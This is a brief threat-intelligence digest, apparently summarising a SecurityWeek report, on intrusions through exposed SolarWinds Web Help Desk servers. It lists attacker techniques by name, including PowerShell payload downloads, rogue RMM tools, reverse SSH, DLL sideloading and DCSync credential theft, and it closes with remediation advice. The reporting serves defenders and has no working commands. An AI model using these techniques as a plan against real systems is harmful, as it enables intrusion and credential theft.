Microsoft observed December 2025 intrusions where attackers leveraged internet-accessible SolarWinds Web Help Desk instances to run PowerShell and download additional payloads, possibly exploiting recently patched vulnerabilities as zero-days. The adversaries established persistence and domain-level access using ManageEngine RMM, reverse SSH/RDP, scheduled QEMU VMs, DLL sideloading and DCSync to steal credentials. #SolarWindsWHD #ManageEngine
Keypoints
- Attackers targeted internet-exposed SolarWinds Web Help Desk instances for initial access.
- Microsoft could not definitively confirm which CVE—CVE-2025-40551, CVE-2025-40536, or CVE-2025-26399—was used.
- PowerShell was used to download and execute additional payloads after initial compromise.
- Adversaries deployed ManageEngine RMM, created scheduled QEMU VMs, used SSH port forwarding and DLL sideloading, and performed DCSync to steal credentials.
- Organizations are advised to patch WHD, remove unauthorized RMM tools, rotate credentials, and isolate compromised hosts immediately.
Read More: https://www.securityweek.com/recent-solarwinds-flaws-potentially-exploited-as-zero-days/